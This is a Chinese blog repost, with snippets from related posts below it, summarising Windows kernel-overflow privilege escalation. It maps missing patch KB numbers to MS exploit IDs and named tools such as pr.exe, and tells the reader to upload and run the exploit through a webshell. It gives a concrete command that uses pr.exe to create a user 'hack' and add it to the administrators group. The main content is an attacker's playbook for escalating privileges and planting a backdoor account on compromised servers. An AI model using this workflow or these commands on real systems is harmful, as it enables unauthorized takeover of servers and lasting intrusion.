Windows溢出提权小结

最新推荐文章于 2024-03-07 10:00:00 发布
最新推荐文章于 2024-03-07 10:00:00 发布
阅读量316 收藏
点赞数
原文链接:http://www.cnblogs.com/milantgh/p/4828783.html
版权

1、  查看系统打补丁情况:systeminfo

 

2、  查看KB-EXP表:

 

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB952004 MS09-012 Pr.exe

KB956572 MS09-012 巴西烤肉

KB971657 MS09-041

KB2620712 MS11-097

KB2393802 MS11-011 ms11011.exe

KB942831 MS08-005

KB2503665 MS11-046 ms11046.exe

KB2592799 MS11-080 ms11080.exe

 

这个表以后会不断更新!

 

3、  webshell中查找可读可写可执行的目录,然后上传我们的EXP

 

如果不能上传,则通过下载EXP解决

 

4、  webshell中执行我们的EXP

 

比如:

 

pr.exe “whoami”

 

执行结果:

 

administrator

 

pr.exe “net user hack 1234 /add & net localgroup administrators hack /add”

 

其他的EXP一个道理~

 

EXP可以参考一下暗月的~

转载于:https://www.cnblogs.com/milantgh/p/4828783.html

weixin_30950607
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-30 1490
溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System权限,其中溢出提权又分为远程溢出和本地溢出。远程溢出需要与远程服务器建立连接,然后根据系统漏洞使用相应的溢出程序获取远程服务器的 Windows操作系统Systen权限。本地溢出是主流的提权方式,通常需要向服务器上传本地溢出程序,然后在服务器执行,如果系统存在漏洞,那么将会溢出获得 Windows操作系统System权限。
Windows系统内核溢出漏洞提权
qq_61553520的博客
05-29 1670
在内存空间中预留了一定的存储空间用来缓冲输入或输出的数据。通俗的讲,缓冲区就是当你打开应用程序或者文件的时候,系统会将数据从内存中复制一份到缓冲区,当再次打开时,系统直接从缓冲区读取,提高打开的速度。
Windows权限提升—溢出提权
剁椒鱼头没剁椒的博客
03-16 2661
这里需要我们了解的权限提升大概分为:后台权限,网站权限,数据本权限。接口权限,系统权限。域控权限等。此提权方法是利用系统本身存在的一些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对比systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以提权提升的exp。不过这里需要注意,只要对应的补丁号加上对应的系统的版本的提权exp才可以成功,有时候如果查找到提权exp提权不成功,那么就可以查看是不是系统版本没对应上,且不排除一些提权漏洞利用需要相应的环境。
(59.1)【windows提权】系统内核溢出漏洞提权:原理、利用过程、利用工具
05-25 1400
提权】系统内核溢出漏洞
Linux溢出提权教程
03-08
不过,值得注意的是,此教程的压缩包文件列表中包含了一个名为"33.exe"的文件,这是一个Windows可执行文件,与Linux提权教程的主题不相符。在实际学习过程中,请确保只使用与教程内容相关的Linux工具和资源。
常见windwos提权笔记
03-30
#### 六、Windows系统内核溢出漏洞提权 ##### 6.1 内核溢出漏洞提权 - **定义**: 攻击者利用系统或软件的内核级漏洞获取System级别的权限。 - **分类**: 分为远程溢出和本地溢出两种类型。 - **远程溢出**: 需要与...
提权工具 pr.exe.zip
12-10
1. **本地提权**:利用系统或服务中的安全漏洞,例如缓冲区溢出、权限配置错误等,来提升当前进程的权限。 2. **权限滥用**:通过发现并利用系统中预设但未正确管理的权限,比如滥用服务帐户,或者通过弱权限的服务...
windows20003 本地溢出提权工具-巴西烤肉
05-04
windows20003 本地溢出提权工具当cmd,和net不能提全时可以用到
Linux提权扫描脚本
最新发布
04-28
这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法、提权扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、提权原理 在Linux系统中,权限分为三类:用户权限、组权限和所有者权限。...
提权工具与补丁对比
02-27
KB952004:MS09-012/PR:KB952004 KB956572:MS09-012/巴西烤肉:KB956572 KB2393802:MS11-011:KB2393802 KB2592799:MS11-080:KB2592799 KB2621440:MS12-0203:KB2621440 KB2160329:MS10-048:KB2160329 KB970483:MS09-020/iis6提权(可能是):KB970483 KB2124261:MS10-065/IIS7提权(可能是):KB2124261 KB2271195:MS10-065/IIS7提权(可能是):KB2271195 KB977165:MS10-015:KB977165 KB2360937:MS10-084:KB2360937 KB2478960:MS11-014:KB2478960 KB2507938:MS11-056:KB2507938 KB2566454:MS11-062:KB2566454 KB2646524:MS12-003:KB2646524 KB2645640:MS12-009:KB2645640 KB2641653:MS12-018:KB2641653 KB944653:MS07-067:KB944653 KB952004:MS09-012:KB952004 KB971657:MS09-041:KB971657 KB2620712:MS11-097:KB2620712 KB942831:MS08-005:KB942831 KB2503665:MS11-046:KB2503665
内网安全—Windows系统内核溢出漏洞提权
wangluoanquan111的博客
03-07 832
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。如果你对网络安全入门感兴趣,那么你需要的话可以点击这里第三种就是去找培训。
提 权
weixin_46273733的博客
01-23 1484
提权 攻击者对服务器提权一般分为两种: 一种是溢出提权,另一种是第三方组件提权溢出提权 溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 root权限,其中溢出提权又分为远程溢出与本地溢出。 远程溢出是指攻击者只需要与服务器建立连接,然后根据系统的漏洞,使用相应的溢出程序,即可获取到远程服务器的 root权限。 本地溢出,攻击者首先需要有服务器一个用户,且需要有执行权限的用户才可能发起提权。攻击者通常会向服务器上传本地溢出程序,在服务器端执行。如果系统存在漏洞,那么将
权限提升-windows内核溢出漏洞提权
weixin_39430198的博客
03-14 1675
一、课时目标 1、理解权限提升的原理和目的 2、掌握常规提权的思路和方法 二、权限提升 2.1 什么是提权 提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限,linux下普通用户提升到root权限。 2.2 为什么要提权 用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更
常见的服务器溢出提权方法
xysoul的专栏
03-20 5639
0×00 前言 0×01 找可写目录 0×02 运行exploit提权 0×03 附录 0×00 前言 溢出漏洞就像杯子里装水,水多了杯子装不进去,就会把里面的水溢出来. 而相对计算机来说计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的. 这
Windows内核溢出漏洞提权
谢公子的博客
02-12 6734
目录 内核溢出漏洞提权 实战MSF中CVE-2018-8120模块本地溢出漏洞提权 查看系统补丁 选择利用模块攻击 内核溢出漏洞提权 本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。 github上windows系统溢出漏洞提权的汇总...
内网渗透之——windows本地漏洞提权之——溢出提权
wsnbbz的博客
03-10 2031
利用本地服务提权漏洞基本思路 1.systeminfo收集补丁信息 执行命令:systeminfo 查看系统信息(包含补丁信息) 2.对比补丁编号,寻找可用exp(Exploit,漏洞攻击脚本) 寻找此版本存在的所有漏洞,对比此服务器有哪些没有打过补丁,利用没打补丁的漏洞exp攻击 3.将合适的exp上传到服务器【可利用dama(密码xiaowang520)、菜刀上传】 exp上传...
Windows 提权------IIS6.exe溢出提权
selecthch的博客
06-26 3904
提权方式:          操作系统漏洞提权:               systeminfo               查看未修补的补丁编号               KB952004 MS09-012        PR    -pr.exe               KB956572 MS09-012        巴西烤肉               KB970483 MS09-...
windows溢出提权
09-21
溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取Windows操作系统System权限。其中溢出提权分为远程溢出和本地溢出。远程溢出需要与远程服务器建立连接,并利用系统漏洞使用相应的溢出程序获取远程服务器的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值